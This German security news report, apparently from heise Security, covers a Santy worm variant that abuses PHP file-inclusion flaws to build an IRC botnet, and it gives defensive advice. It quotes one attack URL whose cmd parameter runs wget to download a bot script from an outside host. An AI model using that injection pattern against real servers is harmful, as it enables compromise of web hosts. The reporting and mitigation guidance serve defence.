Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700 Zombies angemeldet sind, die der Wurm kontrolliert. Über spezielle Kommandos können diese Zombies unter anderem Port-Scans und verteilte DoS-Angriffe durchführen.
Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:
http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;\
wget http://www.visualcoders.net/spybot.txt;
Überprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.
heise Security hat bereits versucht, die Administratoren der für diesen Zweck missbrauchten Site http://www.visualcoders.net zu benachrichtigen, aber bisher keine Antwort erhalten.
Update:
Der Hoster der missbrauchten Site hat aufgrund der Benachrichtigung durch heise Security die Skripte entfernt. Das Problem ist jedoch längst nicht beseitigt. Denn mittlerweile sind weitere Varianten des Wurms aktiv, die Code von anderen Sites nachladen. Die neuen Varianten nutzen teilweise auch andere Suchmaschinen, um PHP-Skripte aufzuspüren.
Der Wurm nutzt einen weit verbreiteten Programmierfehler, der dazu führt, dass ein Angreifer Dateien mit PHP-Code nachladen und ausführen können. Das Problem ist als "File Inclusion Vulnerability" bekannt und betrifft viele PHP-Skripte, die inlude- oder require-Befehle mit nicht ausreichend geprüften Variablen einsetzen. Wer Zugriff auf die Konfiguration des Web-Servers hat, kann sich durch Abschalten der Option allow_url_fopen in der Konfigurationsdatei php.ini gegen solche Attacken schützen. Das beschränkt den Zugriff von PHP auf lokale Dateien. Es bleibt allerdings das Risiko, dass beispielsweise lokale Dateien ausgespäht werden. Deshalb ist es grundsätzlich erforderlich, alle Variablen, die extern gesetzt werden, sorgfältig zu prüfen.
Vorgeschichte:
Eine neue Version des Santy-Wurms sucht jetzt bei Yahoo nach verwundbaren phpBB-Systemen. Bereits am 21.12. hatte der Santy-Wurm durch gezielte Suche bei Google mehr als 40.000 verwundbare Web-Sites aufgespürt und verunstaltet, darunter die Seiten von Softmaker, Men's Health, des Zoos München und der Zeitschrift Connect. Daraufhin hat Google die weitere Ausbreitung gestoppt, indem man die Suchanfragen des Wurms ausfilterte.
Heute erreichte heise Security ein erstes Sample, das die Suche von Yahoo nutzt, um weitere Opfer zu finden. Ein Schweizer Web-Hoster fand dieses Exemplar im /tmp-Verzeichnis eines Kunden, von wo aus es versuchte, andere Sites zu infizieren. Ob diese Wurmversion sich tatsächlich nennenswert verbreitet, ist bisher unklar. Trotzdem sollten alle Betreiber von phpBB-Systemen schnellstmöglich auf die Version 2.0.11 umstellen oder zumindest den im phpBB-Forum beschriebenen Workaround einsetzen. Denn weiter optimierte Versionen des im Quelltext verfügbaren Santy-Wurms kommen bestimmt.